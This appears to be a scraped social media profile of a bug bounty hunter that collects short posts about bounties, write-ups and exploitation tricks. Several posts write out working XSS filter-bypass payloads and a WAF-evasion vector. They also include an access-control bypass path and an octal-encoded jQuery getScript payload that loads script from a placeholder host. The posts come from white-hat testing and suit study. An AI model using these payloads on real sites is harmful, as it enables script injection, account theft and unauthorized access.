One day, the technique for exploiting this vulnerability will be available. Not today, but one day.
Working with other bug hunters makes a huge difference. Two minds bouncing ideas off each other leads to peak efficiency.
Stealthy
143 posts
God is our refuge and strength, an ever-present help in trouble. - Psalm 46
- Check out my vulnerability write-up about critical bugs in Apple infrastructure worth 36,000 in bounties. medium.com/@StealthyBugs/… #BugBounty #exploit #infosec #whitehat #bugbountytips #ethicalhacking
- Thought I'd share this remote code execution on one of the main sites for a large H1 target from a year ago. I found this one by being persistent and using Param Miner by @albinowax. After Param Miner discovered the header it was all manual testing to detect the template engine
- This bypasses a lot. <math><x xlink:href=javascript:confirm`1`>click #xss #bugbounty #bugbountytips #hackerone #infosec #brutexss #xssbypass #xsspayloads #exploit #hacking #hack #ethicalhacking #infosec #whitehat #security
- Improper access control edge case. /admin/index.jsp --> 403, /;/admin/index.jsp --> 200 #bugbounty #bugbountytips #hackerone #infosec #ethicalhacking #infosec #whitehat
- What is your highest bounty for an informative report? This one is from last year's h1-305 LHE.
- This is an interesting trick. Can confuse WAFs into thinking payload is an attribute value. <?tag x="-->" test="<img src=x onerror=alert(1)//"> #xss #bugbounty #bugbountytips #hackerone #infosec #xsspayloads #hacking #ethicalhacking #infosec #whitehat #security #xsspayloads
- Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings. Many file uploads allow SVGs and are prone to tampering. <svg width="600"
- Check out my vulnerability write-up about a remote code execution bug on a public bug bounty program on HackerOne!! medium.com/@StealthyBugs/… #BugBounty #exploit #infosec #whitehat #bugbountytips #ethicalhacking
- Just exploited the hardest bug I've worked on yet. Took a total of two whole weeks and countless hours of pain to finally get the crit. Lessons? There is always a way. @Hacker0x01
- Check out this access control bug that exposed data in one of Apple's admin panels. medium.com/p/dbfb72c7e634 #BugBounty #exploit #infosec #whitehat #bugbountytips #ethicalhacking
- I am so happy and thankful to take home my first LHE trophy on @Hacker0x01. Executioner of #H1305 - most impactful report. I cannot disclose details but the bug is a cool one! Shout-out to all the friends I talked to and the new faces as well 💪😎 keep up the good work.
- Final solution to a stored XSS on a big program on HackerOne. Import any JS while bypassing uppercase in less than 60 characters. $["\147\145\164\123\143\162\151\160\164"]("//SITE.COM") This payload uses the jQuery function getScript in octal. Basically, I ran into a stored XSS
- Pop an alert with no letters and only 84 characters (not final solution but worth sharing; character limit was 60). Thanks to @fransrosen for helping. (()=>{})["\143\157\156\163\164\162\165\143\164\157\162"]("\141\154\145\162\164()")() #xss #bugbounty #bugbountytips #hackerone





